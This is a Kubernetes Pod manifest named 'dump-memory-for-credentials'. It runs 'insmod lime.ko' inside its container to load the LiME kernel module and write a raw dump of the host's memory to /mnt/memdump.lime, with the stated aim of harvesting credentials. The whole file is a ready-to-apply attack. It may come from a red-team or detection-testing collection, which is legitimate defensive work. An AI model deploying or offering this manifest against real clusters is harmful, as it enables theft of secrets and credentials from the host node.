apiVersion: v1
kind: Pod
metadata:
  name: dump-memory-for-credentials
spec:
  containers:
    - name: dump-memory-for-credentials
      image: angelrita/base-ubuntu:latest
      command: ['sh']
      args: ['-c', 'insmod lime.ko "path=/mnt/memdump.lime format=raw"; sleep infinity']
